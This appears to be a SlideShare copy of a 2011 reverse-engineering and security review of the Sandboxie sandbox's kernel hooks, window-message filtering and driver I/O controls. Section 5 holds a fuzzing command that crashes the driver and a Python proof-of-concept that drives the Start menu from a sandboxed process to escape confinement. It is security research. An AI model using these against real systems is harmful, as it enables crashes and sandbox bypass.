SlideShare a Scribd company logo

Sandboxie process isolation with kernel hooks

K
KarlFrank99

Sandboxie process isolation with kernel hooks

Education
1 of 19
Download to read offline
Sandboxie. Process isolation with kernel hooks. May 23rd, 2011 Posted in Uncategorized Write comment 1. Introduction: Sandboxie is a sandbox that performs a process isolation. Its main features: -Access control to kernel resources by direct hooks on kernel objects. -Some ssdt and shadow ssdt hooks to control window messages. -Some kernel registered callbacks to be notified of process creating, images loaded, … In this article I will speak about sandoxie design and I will perform a analysis from a security point of view. 2. Sandboxie design: Sandboxie consists of a interface application, a service, … but we are interested in two components: SbieDrv.sys, the driver that hooks in kernel, and SbieDll.dll, the dll that is injected to the sandboxed processes.
Sandboxie driver hooks in kernel to protect resources from sandboxed processes (it hooks kernel objects of type “Type”, ssdt, shadow ssdt). Driver will put a callback with PsLoadImageNotifyRoutine and PsCreateProcessNotifyRoutine to be notified when a image is loaded or a process is created. Sandboxie driver will have a list with all sandboxed processes that must control. If the parent of a created process is sandboxed, the new process will be linked in the list of sandboxed processes too. The resource access control is easy: if the process is sandboxed, access is denied, and i f the process is not sandboxed, access is granted. However Sandboxie lets some resources to the sandboxed processes. In addition it builds a “parallel” file system, registry, … for sandboxed processes. For this reason Sandboxie will export a lot of functionality with Io Controls for accesing files, registry, … in a secure way. So sandboxed processes must
access system resources with Sandboxie driver Io Controls. Here it comes SbieDll. SbieDll will hook all exports for all dlls into the sandboxed processes. This dll is necessary to have the sandboxed processes working. When it hooks important apis such as ZwCrateFile, ZwCreateProcess, ZwOpenKey, …, the dll stop the normal execution flow to kernel for redirecting it to SbieDrv Io Controls (if you remove all SbieDll user mode hooks with HookShark for example, you can see that the process can’t access anything). 3. Resources access control: Sandboxie hooks some kernel objects found in ObjectTypes directory: token, process, thread, event, section, port and semaphore, of type “Type”. It hooks the function pointer OpenProcedure (OB_OPEN_METHOD type) to control the access to that type of objects: OBJECT_TYPE ->OBJECT_TYPE_INITIALIZER-> OpenProcedure Only with this it can to control file disk access, registry, … It must control window messages too (managed by win32k.sys). It must stop some messages from sandboxed processes, windows hooks, … To do that SbieDrv intercepts some ssdt and shadow ssdt apis: win32k_NtUserCallHwndParamLock win32k_NtUserDestroyWindow win32k_NtUserShowWindow win32k_NtUserSendInput win32k_NtUserBlockInput win32k_NtUserSystemParametersInfo win32k_NtUserSetSysColors win32k_NtUserSetSystemCursor win32k_NtUserMessageCall win32k_NtUserPostMessage win32k_NtUserPostThreadMessage win32k_NtUserSetWindowsHookEx win32k_NtUserSetWinEventHook nt_NtRequestPort nt_NtRequestWaitReplyPort nt_NtTraceEvent 3.1. ObjectTypes hooks: We are going to analyze objects under ObjectTypes and we will take Token object for this analysis with windbg: WINDBG>!object ObjectTypes Object: e1000548 Type: (819f1418) Directory ObjectHeader: e1000530 (oldversion) HandleCount: 0 PointerCount: 25 Directory Object: e1001520 Name: ObjectTypes Hash Address Type Name —- ——- —- —- 00 819f1418 Type Directory 01 819ccca0 Type Thread 819c95e0 Type Mutant
03 8198cca0 Type FilterCommunicationPort 05 819b8e70 Type Controller 07 819c8ca0 Type Profile 819c9980 Type Event 819f15e8 Type Type 09 819c8560 Type Section 819c97b0 Type EventPair 819f1248 Type SymbolicLink 10 819c8730 Type Desktop 11 819c8e70 Type Timer 12 819b8730 Type File 819c8900 Type WindowStation 16 819b8ad0 Type Driver 18 819eb910 Type WmiGuid 819c8ad0 Type KeyedEvent 19 819cc040 Type Token 819b8ca0 Type Device 20 819cc408 Type DebugObject 21 819b8900 Type IoCompletion 22 819cce70 Type Process 24 819f0300 Type Adapter 26 819c5980 Type Key 28 819ccad0 Type Job 31 819f0708 Type WaitablePort 819f08d8 Type Port 32 819c9410 Type Callback 33 8198ce70 Type FilterConnectionPort 34 819c8040 Type Semaphore WINDBG>!object 819cc040 Object: 819cc040 Type: (819f15e8) Type ObjectHeader: 819cc028 (oldversion) HandleCount: 0 PointerCount: 1 Directory Object: e1000548 Name: Token WINDBG>dt _OBJECT_TYPE819cc040 ntdll!_OBJECT_TYPE +0x000 Mutex : _ERESOURCE +0x038 TypeList : _LIST_ENTRY[ 0x819cc078 – 0x819cc078 ] +0x040 Name : _UNICODE_STRING“Token” +0x048 DefaultObject : 0x80558cc0 +0x04c Index : 4 +0x050 TotalNumberOfObjects : 0x1a +0x054 TotalNumberOfHandles : 0x10 +0x058 HighWaterNumberOfObjects : 0x1d +0x05c HighWaterNumberOfHandles : 0x14 +0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER +0x0ac Key : 0x656b6f54 +0x0b0 ObjectLocks : [4] _ERESOURCE Como vemos de ObjectTypes cuelgan varios objetos de tipo Type. La estructura de estos objetos es de tipo _OBJECT_TYPE. We are interested on OBJECT_TYPE structure and OBJECT_TYPE_INITIALIZER because into this sub-structure we find the pointer to OpenProcedure and other callbacks (open, close, delete, …). typedef struct _OBJECT_TYPE_INITIALIZER { USHORT Length; 2 bytes BOOLEAN UseDefaultObject; 1 byte BOOLEAN Reserved; 1 byte
ULONGInvalidAttributes; 4 bytes GENERIC_MAPPINGGenericMapping; 16 bytes ULONGValidAccessMask; 4 bytes BOOLEAN SecurityRequired; 1 byte BOOLEAN MaintainHandleCount; 1 byte BOOLEAN MaintainTypeList; 1 byte POOL_TYPEPoolType; 1 byte ULONGObjectTypeCode; 4 bytes //-> this fielddepends on the OS version, it can //to be here or not so the offset of OpenProcedure //can to be +30h or +34h. ULONGDefaultPagedPoolCharge; 4 bytes ULONGDefaultNonPagedPoolCharge; 4 bytes //—— OB_DUMP_METHOD DumpProcedure; 4 bytes OB_OPEN_METHOD OpenProcedure; 4 bytes OB_CLOSE_METHOD CloseProcedure; 4 bytes OB_DELETE_METHOD DeleteProcedure; 4 bytes OB_PARSE_METHOD ParseProcedure; 4 bytes OB_SECURITY_METHOD SecurityProcedure; 4 bytes OB_QUERYNAME_METHOD QueryNameProcedure; 4 bytes OB_OKAYTOCLOSE_METHOD OkayToCloseProcedure; 4 bytes } OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; The fieldObjectTypeCode only exists with some OS versions andbuilds. SbieDrvhas in mindthis fact. OpenProcedure pointer is OB_OPEN_METHOD: typedef NTSTATUS (NTAPI*OB_OPEN_METHOD)( IN OB_OPEN_REASON Reason, IN PEPROCESS Process OPTIONAL, IN PVOID ObjectBody, IN ACCESS_MASKGrantedAccess, IN ULONGHandleCount ); This callback is called when a object of that type (process, token, …) is opened. SbieDrv hooks the callback OpenProcedure for token, process, thread, event, section, port and semaphore Types. In the next capture we see SbieDrv calling the function that will perform the hook:
It checks OS version and build number to calculate offsets to OpenProcedure into OBJECT_TYPE structure: —— If version < 4: If BuildNumber <= 1770h: O penProcedureO ffset = pTypeO bjHeader+30h+60h Else: O penProcedureO ffset = pTypeO bjHeader+30h+28h Else: If BuildNumber <= 1770h: O penProcedureO ffset = pTypeO bjHeader+30h+60h Else: O penProcedureO ffset = pTypeO bjHeader+34h+28h
—— It creates a code block for the hook that will write into system memory. Surely the OS checks that OpenProcedure is pointing to OS memory, or KeBugCheck is called. The blocks used for hooking will check always if the current process is a sandboxed process, and it will deny the access in that case. Else, it will grant the access. This function that i called “ComprobarProcessIdEnListaDeSandboxeadosObtenerEstructura” searchs the current process in the list of sandboxed processes.
In the next image we can see the code where SbieDrv will create the block code for hooks, and where it overwrite OpenProcedure with its pointer. 3.2. Ssdt and shadow ssdt hooks:
Sandboxie hooks these apis: win32k_NtUserCallHwndParamLock win32k_NtUserDestroyWindow win32k_NtUserShowWindow win32k_NtUserSendInput win32k_NtUserBlockInput win32k_NtUserSystemParametersInfo win32k_NtUserSetSysColors win32k_NtUserSetSystemCursor win32k_NtUserMessageCall win32k_NtUserPostMessage win32k_NtUserPostThreadMessage win32k_NtUserSetWindowsHookEx win32k_NtUserSetWinEventHook nt_NtRequestPort nt_NtRequestWaitReplyPort nt_NtTraceEvent Most of them are related to controlling window messages from sandboxed applications. We are going to analyze the win32k_NtUserMessageCall hook: Hook_Win32k_Gestiona_MensajeDeVentana is a function that will performs checks over a window message sent by a sandboxed process to know if the message must be denied or not.
-It gets the process id of the sender and the receiver of the message. If the process that will receive the message is sandboxed, the message is not denied. -If the message is 0x3e4 it’s not denied. -It gets the target window class name. SbieDrv has a list of window class names to be managed with some exceptions: TrayNotifyWnd SystemTray_Main Connections Tray MS_WebcheckMonitor PrintTray_Notify_WndClass CicLoaderWndClass CicMarshalWndClass Logitech Wingman Internal Message Router devldr CTouchPadSynchronizer Type32_Main_Window TForm_AshampooFirewall WinVNC desktopsink Afx:400000:0 NVIDIA TwinViewWindow Shell_TrayWnd It needs to add this exceptions to let some well known applications to run without problem into the sandbox: explorer, some navigators, etc…
-If the target of the message is a non-sanboxed process, and the sender is a sandboxed process: a) If the target window class name is not a class of the previous list, the message is denied. b) If the target windows class name is in the list: 1. If message < WM_USER(0x400), this messages are denied: 2h – WM_DESTROY 0Bh – WM_SETREDRAW 10h – WM_CLOSE 11h – WM_QUERYENDSESSION 12h – WM_QUIT 16h – WM_ENDSESSION 3Bh – 4Eh – WM_NOTIFY 82h – WM_NCDESTROY 111h – WM_COMMAND 112h – WM_SYSCOMMAND 319h The other messages are granted. 2. If message > WM_USER, it depends of the window class name. For example, it will grant msg 0x4ec for Shell_trayWnd. 4. Io Controls:
Sandboxie device is: deviceSandboxieDriverApi Io Controls must be: DeviceType = FILE_DEVICE_UNKNOWN = 0x00000022 Function = 0x801 Method= METHOD_NEITHER Access = 0 CTL_CODE(0x00000022, 0x801, METHOD_NEITHER, 0); User buffer has a 0x8 <= size <= 0x40 bytes. The first DWORD is always 0x123400XX. It is the id of the operation to perform. SbieDrv has a list with all ids associated with the function to manage them: 0x12340001: [0x12340001][XXXXXXXX][ptr memuser out] Query sandboxie version string. 0x12340002: [0x12340002][XXXXXXXX][XXXXXXXX][XXXXXXXX][ ptr memuser out] [XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX] Query sandboxedprocesses list. 0x12340003:
Write a file. 0x12340007: [0x12340007][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][ptr memuser out] 0x12340008: [0x12340008][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX] [XXXXXXXX][XXXXXXXX][ ptr memuser][XXXXXXXX][ptr memusr][XXXXXXXX][ptr memusr] 0x12340009: Get object frompid. 0x1234000a 0x1234000b: query info about a sandboxedprocess. 0x1234000c: Query systemtime. 0x1234000d: Unprotect user mode memory. [0x1234000D][XXXXXXXX][ptr funcion modo usuario][XXXXXXXX][ptr memoria usuario info hook] 0x1234000f: Query a sandbox option: DisableBoxedWinSxS InjectDll AutoExec OpenProtectedStorage OpenCredentials OpenWinClass NoRenameWinClass BoxNameTitle ClsidTrace OpenClsid StartService StartProgram AutoRecover RecoverFolder AutoRecoverIgnore 0x12340010: Ask to the driver to update with sandboxie.ini y templates.ini (The driver will parse ini files). 0x12340011 0x12340015 0x12340016: Ask the driver to hook ssdt andshadowssdt. 0x12340019 0x1234001e 0x1234001f: Relatedwith access to disk. 0x12340021 0x12340024 0x12340025 0x12340026 0x12340028 0x1234002b: Get process handle. 5. Sandboxie security: 5.1. Fuzzing Io Controls: Here is a simple fuzzing using Kartoffel (kartoffel.reversemode.com): FOR %%A IN (0 1 2) DO FOR %%B IN (0 1 2 3 4 5 6 7 8 9 A B C D E F) DO Kartoffel -d deviceSandboxieDriverApi -n 0x40 -o 0x40 -z 0x40 -Z0x40 -I 0x222007 -u CUSTOM,”[P=0x123400%%A%%B::*0][B=0x41::*0x3c$4][!!]” With this command line we sent Io Controls with size 0x40, and with id from 0x12340001 to 0x1234002f, with a buffer filled with ‘A’. [0x123400XX][AAAAAAAAAAAAAAAAAAAAAAA…] It is a really simple fuzzing, but it’s enough to get a bug check for 0x12340027 id:
WINDBG>!analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* DRIVER_CORRUPTED_MMPOOL (d0) Arguments: Arg1: 6b757a74, memory referenced Arg2: 00123400, IRQL Arg3: 00000000, value 0 = readoperation, 1 = write operation Arg4: 12340027, address which referencedmemory An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is causedby drivers that have corruptedthe systempool. Run the driver verifier against any new(or suspect) drivers, andif that doesn’t turn up the culprit, then use gflags to enable special pool. You can also set HKLMSYSTEMCurrentControlSetControlSession ManagerMemory ManagementProtectNonPagedPool to a DWORD 1 value andreboot. Then the systemwill unmapfreednonpagedpool, preventing drivers (although not DMA-hardware) fromcorrupting the pool. Debugging Details: —————— ************************************************************************* *** *** *** *** *** Your debugger is not using the correct symbols *** *** *** *** In order for this commandto work properly, your symbol path *** *** must point to .pdbfiles that have full type information. *** *** *** *** Certain .pdbfiles (such as the public OS symbols) do not *** *** contain the requiredinformation. Contact the groupthat *** *** providedyou with these symbols if you needthis commandto *** *** work. *** *** *** *** Type referenced: kernel32!pNlsUserInfo *** *** *** ************************************************************************* ************************************************************************* *** *** *** *** *** Your debugger is not using the correct symbols *** *** *** *** In order for this commandto work properly, your symbol path *** *** must point to .pdbfiles that have full type information. *** *** *** *** Certain .pdbfiles (such as the public OS symbols) do not *** *** contain the requiredinformation. Contact the groupthat *** *** providedyou with these symbols if you needthis commandto *** *** work. *** *** *** *** Type referenced: kernel32!pNlsUserInfo *** *** *** ************************************************************************* READ_ADDRESS: 6b757a74 (kuzt -> tzuk -> el nombre del autor) CURRENT_IRQL: 123400 FAULTING_IP: +5c1952f0012c4f0 12340027 ?? ??? DEFAULT_BUCKET_ID: DRIVER_FAULT BUGCHECK_STR: 0xD0
PROCESS_NAME: Kartoffel.exe LAST_CONTROL_TRANSFER: from804f7b27 to 8052716c STACK_TEXT: f7642750 804f7b27 00000003 f7642aac 00000000 nt!RtlpBreakWithStatusInstruction f764279c 804f8714 00000003 c0000005 00000000 nt!KiBugCheckDebugBreak+0x19 f7642b7c 804f8c3f 000000d0 6b757a74 00123400 nt!KeBugCheck2+0x574 f7642b9c f7cce31f 000000d0 6b757a74 00123400 nt!KeBugCheckEx+0x1b WARNING: Stack unwindinformation not available. Following frames may be wrong. f7642c34 804ee0ef 81740340 817398a0 806d12d0 SbieDrv+0x131f f7642c44 80574032 81739910 818b2b88 817398a0 nt!IopfCallDriver+0x31 f7642c58 80574ec1 81740340 817398a0 818b2b88 nt!IopSynchronousServiceTail+0x60 f7642d00 8056d81e 000007b4 00000000 00000000 nt!IopXxxControlFile+0x5e7 f7642d34 8053cbc8 000007b4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a f7642d34 7c91eb94 000007b4 00000000 00000000 nt!KiFastCallEntry+0xf8 0012eca4 7c91d8ef 7c8016be 000007b4 00000000 ntdll!KiFastSystemCallRet 0012eca8 7c8016be 000007b4 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc 0012ed08 0040617d000007b4 00222007 003b0808 kernel32!DeviceIoControl+0x78 0012fee4 0040a9cd0000000f 003b0b40 003b0c10 Kartoffel+0x617d 0012ffc0 7c816ff7 0000001a 00000000 7ffdd000 Kartoffel+0xa9cd 0012fff0 00000000 0040a85a 00000000 78746341 kernel32!BaseProcessStart+0x23 STACK_COMMAND: kb FOLLOWUP_IP: SbieDrv+131f f7cce31f 8bf7 movesi,edi SYMBOL_STACK_INDEX: 4 SYMBOL_NAME: SbieDrv+131f FOLLOWUP_NAME: MachineOwner MODULE_NAME: SbieDrv IMAGE_NAME: SbieDrv.sys DEBUG_FLR_IMAGE_TIMESTAMP: 4d8b29aa FAILURE_BUCKET_ID: 0xD0_SbieDrv+131f BUCKET_ID: 0xD0_SbieDrv+131f Followup: MachineOwner ——— Sorting ‘Functions window’… ok KeBugCheck is called from SbieDrv so it is only a non dangerous DoS (we can cause it from a sandboxed process), but we can see that a simple fuzzing causes a crash, and this fact makes me suspicious of Sandboxie robusticity. 5.2. Sending window messages to Shell_TrayWnd (excluded window): Shell_TrayWnd is a window class name that Sandboxie will give a special management. Sandboxie will let to send more window messages to these window class name from the sandboxed processes. The next script shows how these additional messages let us to launch application linked from the start menu from a sandboxed process: import random random.seed() VK_LEFT=0x25 VK_UP=0x26 VK_RIGHT=0x27 VK_DOWN=0x28 VK_RETURN=0x0d VK_TAB=0x09 VK_SHIFT=0x10
VK_CONTROL=0x11 VK_MENU=0x12 import ctypes import time fromctypes.wintypes import DWORD, HWND, HANDLE, LPCWSTR, WPARAM, LPARAM, RECT, POINT trayRect=RECT(0,0,0,0) trayWindow= ctypes.windll.user32.FindWindowExA(0,0,”Shell_TrayWnd”,0) trayNotifyWindow= ctypes.windll.user32.FindWindowExA(trayWindow,0,”TrayNotifyWnd”,0) def PressKey(hwin,key): msgkeydown=0x100 msgkeyup=0x101 ctypes.windll.user32.PostMessageA(hwin, msgkeydown, key, 0) #KEYDOWN time.sleep(0.1) ctypes.windll.user32.PostMessageA(hwin, msgkeyup, key, 0) #KEYUP time.sleep(0.1) ctypes.windll.user32.PostMessageA(trayWindow, 0xa1, 1, 0x200020) #WM_NCLBUTTONDOWN ctypes.windll.user32.PostMessageA(trayWindow, 0xa2, 0, 0x200020) #WM_NCLBUTTONUP PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_UP) PressKey(trayWindow, VK_RIGHT) PressKey(trayWindow, VK_RIGHT) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_DOWN) PressKey(trayWindow, VK_RETURN) (The key pressed in this script will lauch calc.exe in my system, with the disposition of my start menu). This is not a high security risk but I think it is not the good behaviour for a sandbox. 5.3. Long names: Sandboxie have problems with long names (more than MAX_PATH and less than 32767 wide chars) because LoadImageNitifyRoutine image name param comes with NULL. I have not found security risks here but I have found some strange behaviours that will not appears if Sandboxie is not installed. This detail mades us to think it is risky to intercept so much things in kernel, and difficult to have in mind all possibilities and cases. 5.4. Complex formats parsing: From my point of view, Sandboxie has risky code in kernel. For example, SbieDrv LoadImageNotifyRoutine callback parses in depth PE Headers of the loaded image (directly in user mode).
0x12340010 io control opens and parses .ini files from kernel:
SbieDrv disassembles instructions for hooking functions of kernel and user mode, to keep instructions at entry point of the function that will be overwritten. 5.5. Conclusion: From my point of view process isolation sandboxs have a intrinsic risk: -It is difficult to intercept all that sandboxed process should not have access. -It will introduce risky code in sensitive points of the system. -Hooks and changes to the system will depend of the system version and build, and lof of times they will be dirty and undocumented. -Surely you will need to add some exceptions in the way that Sandboxie does.
-Specifically, Sandboxie has risky code in kernel: PE headers parsing, ini files parsing. My conclusion about Sandboxie is that it is a useful tool. I would run a navigator or a pdf reader sandboxed, to help to protect myself from vulnerabilities, but I wouldn’t run a malware to analyze its behaviour in Sandboxie, unless Sandboxie was running in vmware, bochs or other virtual machine.

Recommended

Live Updating Swift Code
Live Updating Swift CodeLive Updating Swift Code
Live Updating Swift CodeBartosz Polaczyk
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programingwahyuseptiansyah
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Notes for xx_use_serialgc
Notes for xx_use_serialgcNotes for xx_use_serialgc
Notes for xx_use_serialgcytoshima
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMRafael Winterhalter
 
IDSECCONF2013 CTF online Write Up
IDSECCONF2013 CTF online Write Up IDSECCONF2013 CTF online Write Up
IDSECCONF2013 CTF online Write Up idsecconf
 

Recommended

Live Updating Swift Code
Live Updating Swift CodeLive Updating Swift Code
Live Updating Swift CodeBartosz Polaczyk
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programingwahyuseptiansyah
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Notes for xx_use_serialgc
Notes for xx_use_serialgcNotes for xx_use_serialgc
Notes for xx_use_serialgcytoshima
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMRafael Winterhalter
 
IDSECCONF2013 CTF online Write Up
IDSECCONF2013 CTF online Write Up IDSECCONF2013 CTF online Write Up
IDSECCONF2013 CTF online Write Up idsecconf
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
JVM code reading -- C2
JVM code reading -- C2JVM code reading -- C2
JVM code reading -- C2ytoshima
 
HotSpot template interpreter memos
HotSpot template interpreter memosHotSpot template interpreter memos
HotSpot template interpreter memosytoshima
 
Sniffing Mach Messages
Sniffing Mach MessagesSniffing Mach Messages
Sniffing Mach MessagesMikhail Sosonkin
 
Evernote ウェブサービスAPI
Evernote ウェブサービスAPIEvernote ウェブサービスAPI
Evernote ウェブサービスAPIFumihiro Kato
 
Дмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репортДмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репортSergey Platonov
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Binaries Are Not Only Output
Binaries Are Not Only OutputBinaries Are Not Only Output
Binaries Are Not Only OutputHajime Morrita
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgePVS-Studio
 
Stop Monkeys Fall
Stop Monkeys FallStop Monkeys Fall
Stop Monkeys FallHajime Morrita
 
The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84Mahmoud Samir Fayed
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzle20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzleComputer Science Club
 
Real world cross-platform testing
Real world cross-platform testingReal world cross-platform testing
Real world cross-platform testingPeter Edwards
 
A Life of breakpoint
A Life of breakpointA Life of breakpoint
A Life of breakpointHajime Morrita
 
A topology of memory leaks on the JVM
A topology of memory leaks on the JVMA topology of memory leaks on the JVM
A topology of memory leaks on the JVMRafael Winterhalter
 
The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202Mahmoud Samir Fayed
 
Book
BookBook
Bookluis_lmro
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 

More Related Content

What's hot

NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
JVM code reading -- C2
JVM code reading -- C2JVM code reading -- C2
JVM code reading -- C2ytoshima
 
HotSpot template interpreter memos
HotSpot template interpreter memosHotSpot template interpreter memos
HotSpot template interpreter memosytoshima
 
Evernote ウェブサービスAPI
Evernote ウェブサービスAPIEvernote ウェブサービスAPI
Evernote ウェブサービスAPIFumihiro Kato
 
Дмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репортДмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репортSergey Platonov
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Binaries Are Not Only Output
Binaries Are Not Only OutputBinaries Are Not Only Output
Binaries Are Not Only OutputHajime Morrita
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgePVS-Studio
 
The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84Mahmoud Samir Fayed
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzle20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzleComputer Science Club
 
Real world cross-platform testing
Real world cross-platform testingReal world cross-platform testing
Real world cross-platform testingPeter Edwards
 
A topology of memory leaks on the JVM
A topology of memory leaks on the JVMA topology of memory leaks on the JVM
A topology of memory leaks on the JVMRafael Winterhalter
 
The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202Mahmoud Samir Fayed
 

What's hot (20)

NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
 
JVM code reading -- C2
JVM code reading -- C2JVM code reading -- C2
JVM code reading -- C2
 
HotSpot template interpreter memos
HotSpot template interpreter memosHotSpot template interpreter memos
HotSpot template interpreter memos
 
Sniffing Mach Messages
Sniffing Mach MessagesSniffing Mach Messages
Sniffing Mach Messages
 
Evernote ウェブサービスAPI
Evernote ウェブサービスAPIEvernote ウェブサービスAPI
Evernote ウェブサービスAPI
 
Дмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репортДмитрий Демчук. Кроссплатформенный краш-репорт
Дмитрий Демчук. Кроссплатформенный краш-репорт
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_public
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Binaries Are Not Only Output
Binaries Are Not Only OutputBinaries Are Not Only Output
Binaries Are Not Only Output
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
 
Stop Monkeys Fall
